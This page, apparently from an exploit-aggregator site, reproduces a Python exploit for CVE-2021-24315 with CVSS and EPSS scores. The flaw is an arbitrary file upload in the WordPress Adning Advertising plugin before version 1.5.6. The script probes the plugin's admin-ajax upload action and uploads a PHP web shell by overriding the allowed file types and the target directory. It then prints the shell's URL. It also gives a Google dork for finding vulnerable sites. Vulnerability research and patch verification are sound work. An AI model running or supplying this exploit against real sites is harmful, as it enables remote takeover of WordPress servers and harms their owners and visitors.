Advertisement






WordPress Adning Advertising 1.5.5 Shell Upload

CVE Category Price Severity
CVE-2021-24315 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120171

Below is a copy:

WordPress Adning Advertising 1.5.5 Shell Upload
# Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/angwp
# Date: 23/12/2020
# Exploit Author: spacehen
# Vendor Homepage: http://adning.com/
# Version: <1.5.6
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
print("Adning Advertising < 1.5.6 - Arbitrary File Upload")
print("Author -> space_hen (www.lunar.sh)")

def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
response = requests.get(uri)
raw = response.text

if ("no files found" in raw):
return True;
else:
return False;

def main():

print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);

base = sys.argv[1]
file_path = sys.argv[2]

ajax_action = '_ning_upload_image'
admin = '/wp-admin/admin-ajax.php';

uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);

if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)

files = {'files[]' : open(file_path)}
data = {
"allowed_file_types" : "php,jpg,jpeg",
"upload" : json.dumps({"dir" : "../"})
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
file_name = path.basename(file_path)
if(file_name in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + file_name)
else:
print("Shell Upload Failed")
sys.exit(1)

main();

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.